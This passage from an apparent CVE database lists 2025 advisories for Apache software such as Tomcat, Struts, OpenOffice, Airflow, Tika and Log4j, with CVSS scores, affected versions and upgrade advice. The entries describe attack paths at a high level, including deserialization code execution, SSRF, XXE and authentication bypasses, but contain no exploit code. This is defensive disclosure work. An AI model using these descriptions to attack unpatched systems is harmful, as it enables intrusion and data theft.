apache jackrabbit_jcr_commons *
CVE-2025-59118

Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.03. Users are recommended to upgrade to version 24.09.03, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-59302

In Apache CloudStack improper control of generation of code ('Code Injection') vulnerability is found in the following APIs which are accessible only to admins. * quotaTariffCreate * quotaTariffUpdate * createSecondaryStorageSelector * updateSecondaryStorageSelector * updateHost * updateStorage This issue affects Apache CloudStack: from 4.18.0 before 4.20.2, from 4.21.0 before 4.22.0. Users are recommended to upgrade to versions 4.20.2 or 4.22.0, which contain the fix. The fix introduces a new global configuration flag, js.interpretation.enabled, allowing administrators to control the interpretation of JavaScript expressions in these APIs, thereby mitigating the code injection risk.

Products Affected

Vendor Product Version
apache cloudstack 4.21.0.0
apache cloudstack *
CVE-2025-59328

A vulnerability in Apache Fory allows a remote attacker to cause a Denial of Service (DoS). The issue stems from the insecure deserialization of untrusted data. An attacker can supply a large, specially crafted data payload that, when processed, consumes an excessive amount of CPU resources during the deserialization process. This leads to CPU exhaustion, rendering the application or system using the Apache Fory library unresponsive and unavailable to legitimate users. Users of Apache Fory are strongly advised to upgrade to version 0.12.2 or later to mitigate this vulnerability. Developers of libraries and applications that depend on Apache Fory should update their dependency requirements to Apache Fory 0.12.2 or later and release new versions of their software.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache fory *
CVE-2025-59355

A vulnerability. When org.apache.linkis.metadata.util.HiveUtils.decode() fails to perform Base64 decoding, it records the complete input parameter string in the log via logger.error(str + "decode failed", e). If the input parameter contains sensitive information such as Hive Metastore keys, plaintext passwords will be left in the log files when decoding fails, resulting in information leakage. Affected Scope Component: Sensitive fields in hive-site.xml (e.g., javax.jdo.option.ConnectionPassword) or other fields encoded in Base64. Version: Apache Linkis 1.0.0 – 1.7.0 Trigger Conditions The value of the configuration item is an invalid Base64 string. Log files are readable by users other than hive-site.xml administrators. Severity: Low The probability of Base64 decoding failure is low. The leakage is only triggered when logs at the Error level are exposed. Remediation Apache Linkis 1.8.0 and later versions have replaced the log with desensitized content. logger.error("URL decode failed: {}", e.getMessage()); // 不再输出 str Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2025-59390

Apache Druid’s Kerberos authenticator uses a weak fallback secret when the `druid.auth.authenticator.kerberos.cookieSignatureSecret` configuration is not explicitly set. In this case, the secret is generated using `ThreadLocalRandom`, which is not a crypto-graphically secure random number generator. This may allow an attacker to predict or brute force the secret used to sign authentication cookies, potentially enabling token forgery or authentication bypass. Additionally, each process generates its own fallback secret, resulting in inconsistent secrets across nodes. This causes authentication failures in distributed or multi-broker deployments, effectively leading to a incorrectly configured clusters. Users are advised to configure a strong `druid.auth.authenticator.kerberos.cookieSignatureSecret` This issue affects Apache Druid: through 34.0.0. Users are recommended to upgrade to version 35.0.0, which fixes the issue making it mandatory to set `druid.auth.authenticator.kerberos.cookieSignatureSecret` when using the Kerberos authenticator. Services will fail to come up if the secret is not set.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache druid *
CVE-2025-59454

In Apache CloudStack, a gap in access control checks affected the APIs - createNetworkACL - listNetworkACLs - listResourceDetails - listVirtualMachinesUsageHistory - listVolumesUsageHistory While these APIs were accessible only to authorized users, insufficient permission validation meant that users could occasionally access information beyond their intended scope. Users are recommended to upgrade to Apache CloudStack 4.20.2.0 or 4.22.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache cloudstack 4.21.0.0
apache cloudstack *
CVE-2025-59775

Server-Side Request Forgery (SSRF) vulnerability  in Apache HTTP Server on Windows with AllowEncodedSlashes On and MergeSlashes Off  allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-59789

Uncontrolled recursion in the json2pb component in Apache bRPC (version < 1.15.0) on all platforms allows remote attackers to make the server crash via sending deep recursive json data. Root Cause: The bRPC json2pb component uses rapidjson to parse json data from the network. The rapidjson parser uses a recursive parsing method by default. If the input json has a large depth of recursive structure, the parser function may run into stack overflow. Affected Scenarios: Use bRPC server with protobuf message to serve http+json requests from untrusted network. Or directly use JsonToProtoMessage to convert json from untrusted input. How to Fix: (Choose one of the following options)  1. Upgrade bRPC to version 1.15.0, which fixes this issue. 2. Apply this patch: https://github.com/apache/brpc/pull/3099 Note: No matter which option you choose, you should know that the fix introduces a recursion depth limit with default value 100. It affects these functions:  ProtoMessageToJson, ProtoMessageToProtoJson, JsonToProtoMessage, and ProtoJsonToProtoMessage. If your requests contain json or protobuf messages that have a depth exceeding the limit, the request will be failed after applying the fix. You can modify the gflag json2pb_max_recursion_depth to change the limit.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache brpc *
CVE-2025-59790

Improper Privilege Management vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from v2.9.0 through v2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-59792

Reveals plaintext credentials in the MONITOR command vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from 1.0.0 through 2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-60012

Malicious configuration can lead to unauthorized file access in Apache Livy. This issue affects Apache Livy 0.7.0 and 0.8.0 when connecting to Apache Spark 3.1 or later. A request that includes a Spark configuration value supported from Apache Spark version 3.1 can lead to users gaining access to files they do not have permissions to. For the vulnerability to be exploitable, the user needs to have access to Apache Livy's REST or JDBC interface and be able to send requests with arbitrary Spark configuration values. Users are recommended to upgrade to version 0.9.0 or later, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache livy *
CVE-2025-61581

** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control. This issue affects Apache Traffic Control: all versions. People with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2025-61622

Deserialization of untrusted data in python in pyfory versions 0.12.0 through 0.12.2, or the legacy pyfury versions from 0.1.0 through 0.10.3: allows arbitrary code execution. An application is vulnerable if it reads pyfory serialized data from untrusted sources. An attacker can craft a data stream that selects pickle-fallback serializer during deserialization, leading to the execution of `pickle.loads`, which is vulnerable to remote code execution. Users are recommended to upgrade to pyfory version 0.12.3 or later, which has removed pickle fallback serializer and thus fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache fory *
CVE-2025-61623

Reflected cross-site scripting vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.03. Users are recommended to upgrade to version 24.09.03, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-61733

Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Kylin. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kylin *
CVE-2025-61734

Files or Directories Accessible to External Parties vulnerability in Apache Kylin. You are fine as long as the Kylin's system and project admin access is well protected. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kylin *
CVE-2025-61735

Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. You are fine as long as the Kylin's system and project admin access is well protected. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache kylin *
CVE-2025-61795

Improper Resource Shutdown or Release vulnerability in Apache Tomcat. If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H 1.6 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-62228

Apache Flink CDC version 3.4.0 was vulnerable to a SQL injection via maliciously crafted identifiers eg. crafted database name or crafted table name. Even through only the logged-in database user can trigger the attack, we recommend users update Flink CDC version to 3.5.0 which address this issue.

Products Affected

Vendor Product Version
apache flink_cdc 3.4.0
CVE-2025-62232

Sensitive data exposure via logging in basic-auth leads to plaintext usernames and passwords written to error logs and forwarded to log sinks when log level is INFO/DEBUG. This creates a high risk of credential compromise through log access. It has been fixed in the following commit:  https://github.com/apache/apisix/pull/12629 Users are recommended to upgrade to version 3.14, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apisix *
CVE-2025-62233

Deserialization of Untrusted Data vulnerability in Apache DolphinScheduler RPC module. This issue affects Apache DolphinScheduler:  Version >= 3.2.0 and < 3.3.1. Attackers who can access the Master or Worker nodes can compromise the system by creating a StandardRpcRequest, injecting a malicious class type into it, and sending RPC requests to the DolphinScheduler Master/Worker nodes. Users are recommended to upgrade to version [3.3.1], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2025-62235

Authentication Bypass by Spoofing vulnerability in Apache NimBLE. Receiving specially crafted Security Request could lead to removal of original bond and re-bond with impostor. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-62402

API users via `/api/v2/dagReports` could perform Dag code execution in the context of the api-server if the api-server was deployed in the environment where Dag files were available.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-62503

User with CREATE and no UPDATE privilege for Pools, Connections, Variables could update existing records via bulk create API with overwrite action.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-62728

SQL injection vulnerability in Hive Metastore Server (HMS) when processing delete column statistics requests via the Thrift APIs. The vulnerability is only exploitable by trusted/authorized users/applications that are allowed to call directly the Thrift APIs. In most real-world deployments, HMS is accessible to only a handful of applications (e.g., Hiveserver2) thus the vulnerability is not exploitable. Moreover, the vulnerable code cannot be reached when metastore.try.direct.sql property is set to false. This issue affects Apache Hive: from 4.1.0 before 4.2.0. Users are recommended to upgrade to version 4.2.0, which fixes the issue. Users who cannot upgrade directly are encouraged to set metastore.try.direct.sql property to false if the HMS Thrift APIs are exposed to general public.

Products Affected

Vendor Product Version
apache hive 4.1.0
CVE-2025-64401

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, documents that used "floating frames" linked to external files would load the contents of those frames without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue. The LibreOffice suite reported this issue as CVE-2023-2255

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64402

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, documents that used "OLE objects" linked to external files would load the contents of those files without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64403

Apache OpenOffice Calc spreadsheet can contain links to other files, in the form of "external data sources". A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause such links to be loaded without prompt. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64404

Apache OpenOffice documents can contain links to other files. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, documents that used background fill images, or bullet images, linked to external files would load the contents of those files without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64405

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of Apache OpenOffice, Calc spreadsheet containing DDE links to external files would load the contents of those files without prompting the user for permission to do so. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64406

An out-of-bounds Write vulnerability in Apache OpenOffice could allow an attacker to craft a document that would crash the program, or otherwise corrupt other memory areas. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64407

Apache OpenOffice documents can contain links. A missing Authorization vulnerability in Apache OpenOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. Such links could also be used to transmit system information, such as environment variables or configuration settings. In the affected versions of Apache OpenOffice, documents that used a certain URI scheme linking to external files would load the contents of such files without prompting the user for permission to do so. Such URI scheme allows to include system configuration data, that is not supposed to be transmitted externally. This issue affects Apache OpenOffice: through 4.1.15. Users are recommended to upgrade to version 4.1.16, which fixes the issue. The LibreOffice suite reported this issue as CVE-2024-12426.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache openoffice *
CVE-2025-64408

Apache Causeway faces Java deserialization vulnerabilities that allow remote code execution (RCE) through user-controllable URL parameters. These vulnerabilities affect all applications using Causeway's ViewModel functionality and can be exploited by authenticated attackers to execute arbitrary code with application privileges.  This issue affects all current versions. Users are recommended to upgrade to version 3.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache causeway *
apache causeway 4.0.0
CVE-2025-64775

Denial of Service vulnerability in Apache Struts, file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.0, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache struts *
CVE-2025-65082

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs. This issue affects Apache HTTP Server from 2.4.0 through 2.4.65. Users are recommended to upgrade to version 2.4.66 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-65998

Apache Syncope can be configured to store the user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtained access to the internal database content, to reconstruct the original cleartext password values. This is not affecting encrypted plain attributes, whose values are also stored using AES encryption. Users are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache syncope *
CVE-2025-66168

WARNING: Users of 6.x should upgrade to 6.2.4 or later as the fix was missed in previous 6.x releases. See the  following for more details: https://activemq.apache.org/security-advisories.data/CVE-2026-40046-announcement.txt https://www.cve.org/CVERecord?id=CVE-2026-40046 Original Report: Apache ActiveMQ does not properly validate the remaining length field which may lead to an overflow during the decoding of malformed packets. When this integer overflow occurs, ActiveMQ may incorrectly compute the total Remaining Length and subsequently misinterpret the payload as multiple MQTT control packets which makes the broker susceptible to unexpected behavior when interacting with non-compliant clients. This behavior violates the MQTT v3.1.1 specification, which restricts Remaining Length to a maximum of 4 bytes. The scenario occurs on established connections after the authentication process. Brokers that are not enabling mqtt transport connectors are not impacted. This issue affects Apache ActiveMQ: before 5.19.2, 6.0.0 to 6.1.8, and 6.2.0 Users are recommended to upgrade to version 5.19.2, 6.1.9, or 6.2.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache activemq *
apache activemq 6.2.0
CVE-2025-66169

Cypher Injection vulnerability in Apache Camel camel-neo4j component. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0 Users are recommended to upgrade to version 4.10.8 for 4.10.x LTS and 4.14.3 for 4.14.x LTS and 4.17.0.

Products Affected

Vendor Product Version
apache camel *
CVE-2025-66200

mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid. This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L 2.8 2.5

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-66388

A vulnerability in Apache Airflow allowed authenticated UI users to view secret values in rendered templates due to secrets not being properly redacted, potentially exposing secrets to users without the appropriate authorization. Users are recommended to upgrade to version 3.1.4, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-66516

Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.

Products Affected

Vendor Product Version
apache tika *
CVE-2025-66518

Any client who can access to Apache Kyuubi Server via Kyuubi frontend protocols can bypass server-side config kyuubi.session.local.dir.allow.list and use local files which are not listed in the config. This issue affects Apache Kyuubi: from 1.6.0 through 1.10.2. Users are recommended to upgrade to version 1.10.3 or upper, which fixes the issue.

Products Affected

Vendor Product Version
apache kyuubi *
CVE-2025-66524

Apache NiFi 1.20.0 through 2.6.0 include the GetAsanaObject Processor, which requires integration with a configurable Distribute Map Cache Client Service for storing and retrieving state information. The GetAsanaObject Processor used generic Java Object serialization and deserialization without filtering. Unfiltered Java object deserialization does not provide protection against crafted state information stored in the cache server configured for GetAsanaObject. Exploitation requires an Apache NiFi system running with the GetAsanaObject Processor, and direct access to the configured cache server. Upgrading to Apache NiFi 2.7.0 is the recommended mitigation, which replaces Java Object serialization with JSON serialization. Removing the GetAsanaObject Processor located in the nifi-asana-processors-nar bundle also prevents exploitation.

Products Affected

Vendor Product Version
apache nifi 2.7.0
apache nifi *
CVE-2025-66614

Improper Input Validation vulnerability. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0-M1 through 9.0.112. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Older EOL versions are not affected. Tomcat did not validate that the host name provided via the SNI extension was the same as the host name provided in the HTTP host header field. If Tomcat was configured with more than one virtual host and the TLS configuration for one of those hosts did not require client certificate authentication but another one did, it was possible for a client to bypass the client certificate authentication by sending different host names in the SNI extension and the HTTP host header field. The vulnerability only applies if client certificate authentication is only enforced at the Connector. It does not apply if client certificate authentication is enforced at the web application. Users are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
CVE-2025-66675

Denial of Service vulnerability in Apache Struts, file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.4, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue. It's related to  https://cve.org/CVERecord?id=CVE-2025-64775  - this CVE addresses missing affected version 6.7.4

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H 3.9 4.2

Products Affected

Vendor Product Version
apache struts *
CVE-2025-67895

Edge3 Worker RPC RCE on Airflow 2. This issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2. The Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do. If you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) has minimum version of Airflow set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use the Edge3 provider 2.0.0+ on Airflow 2. If you used Edge Provider in Airflow 3, you are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-edge3 *
CVE-2025-68161

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName configuration attribute or the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property is set to true. This issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions: * The attacker is able to intercept or redirect network traffic between the client and the log receiver. * The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender’s configured trust store (or by the default Java trust store if no custom trust store is configured). Users are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue. As an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates.

Products Affected

Vendor Product Version
apache log4j 2.0
apache log4j *
